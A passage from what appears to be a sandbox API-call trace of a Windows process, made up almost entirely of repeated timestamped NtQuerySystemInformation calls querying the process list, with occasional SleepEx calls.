Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.144] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.148] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.158] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.159] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.160] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.161] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.161] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.162] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.162] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.163] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.163] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.164] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.164] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.165] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.166] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.168] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.180] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.186] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.187] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.187] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.188] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.188] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.189] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.189] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.189] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.190] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.190] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.191] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.191] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.192] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.196] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.197] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.197] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.197] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.198] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.198] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.199] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.199] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.199] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.200] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.200] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.201] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.201] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.202] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeea8) returned 0x0 [0202.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.222] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.222] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.223] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.223] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.224] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.224] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.225] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.225] SleepEx (dwMilliseconds=0x2, bAlertable=0) returned 0x0 [0202.240] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.241] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.241] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.242] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.242] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.242] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.246] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.247] SleepEx (dwMilliseconds=0x2, bAlertable=0) returned 0x0 [0202.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.272] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.272] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.273] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.273] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.274] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.274] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.274] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.275] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.275] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.276] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.289] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.290] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.290] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.291] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.291] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.292] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.292] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.292] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.295] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.295] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.299] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.299] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.301] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.301] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.302] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.302] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.303] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.303] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.304] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.304] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.305] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.305] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.308] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.309] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.309] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.310] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.310] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.310] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.311] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.311] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.312] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.312] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.312] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.313] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.319] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.322] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.323] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.323] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.325] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.325] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.326] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.326] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.326] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.327] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.327] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.328] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.328] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.346] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.346] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.347] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.347] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, 